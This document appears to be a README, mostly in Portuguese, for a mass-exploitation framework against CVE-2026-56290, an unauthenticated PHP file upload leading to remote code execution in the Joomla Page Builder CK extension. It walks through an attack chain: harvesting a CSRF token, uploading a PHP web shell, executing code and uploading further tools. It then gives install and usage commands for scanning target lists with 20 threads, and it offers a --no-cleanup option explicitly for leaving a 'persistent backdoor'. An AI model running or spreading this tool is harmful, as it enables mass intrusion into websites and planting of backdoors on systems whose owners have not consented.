
📤 Framework de exploração em massa para CVE-2026-56290 — upload de arquivo não autenticado para RCE no Page Builder CK Joomla
CVE-2026-56290 é uma vulnerabilidade de severidade crítica no Page Builder CK (com_pagebuilderck), uma extensão popular de construtor de páginas para Joomla. O método browse.ajaxAddPicture do controlador aceita uploads de arquivos não autenticados com um caminho de destino controlado pelo usuário, permitindo que atacantes gravem arquivos PHP arbitrários em diretórios acessíveis pela web.
// browse.php controller — NO authentication check
function ajaxAddPicture() {
$input = JFactory::getApplication()->input;
$file = $input->files->get('file', null); // ← user-controlled file
$path = trim($input->get('path', '')); // ← user-controlled path, only trim()!
// ... uploads file to $path without validating the destination
}
O parâmetro path passa por apenas sanitização com trim() — sem whitelist, sem verificação de traversal de diretórios, sem barreira de autenticação. Combinado com um token CSRF publicamente acessível em qualquer página do Joomla, atacantes podem enviar remotamente shells PHP para qualquer diretório gravável.
| Vetor | Severidade | Impacto |
|---|---|---|
| Upload Não Autenticado de Arquivo | 9.8 (Crítica) | Execução arbitrária de código PHP |
| Coleta de Token CSRF | 5.3 (Média) | Viabiliza a cadeia de upload |
| Divulgação de Informações | 5.3 (Média) | Identificação da versão da extensão |
1. HIT Joomla homepage → harvest CSRF token (hex32 + value "1")
2. POST file upload → task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in → media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL → code executes, RCE confirmed
5. POST f=@file to shell → upload additional tools
6. GET ?cleanup=1 → shell self-destructs
| Versão do Page Builder CK | Status | Notas |
|---|---|---|
| 3.1.1 e anteriores | 🔴 Vulnerável | Upload não autenticado confirmado |
| 3.4.10 e anteriores | 🔴 Vulnerável | Faixa estendida conforme análise |
| 3.5.10 e anteriores | 🔴 Vulnerável | Algumas variantes corrigidas podem existir |
| > 3.5.10 | 🟢 Possivelmente Corrigida | Verifique via XML do manifesto |
Nota: A versão é detectada a partir do arquivo de manifesto do Joomla em
/administrator/manifests/files/com_pagebuilderck.xml. Se o manifesto estiver inacessível, o scanner trata o alvo como potencialmente vulnerável por padrão.
🔍 Reconhecimento
|
💀 Exploração
|
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit
# Install dependencies
pip install -r requirements.txt
# Verify
python cve_2026_56290.py --help
requests>=2.28.0
urllib3>=1.26.0
CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator
-t, --target Single target URL
-f, --file File with target URLs (one per line, # for comments)
-o, --output Live TXT output file (default: cve-2026-56290_live.txt)
--json JSON report file path (default: cve-2026-56290_report.json)
--threads Concurrent workers (default: 20)
--timeout Request timeout in seconds (default: 15)
--no-cleanup Leave shells on target (persistent backdoor)
-v, --verbose Verbose endpoint discovery output
--known-endpoint Skip discovery: task,file_param,folder_param
# Single target
python cve_2026_56290.py -t https://target.com
# Mass scan from file
python cve_2026_56290.py -f targets.txt
# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v
# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup
# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
Live TXT: live_results.txt
2026-07-04 15:30:00
────────────────────────────────────────────────────────────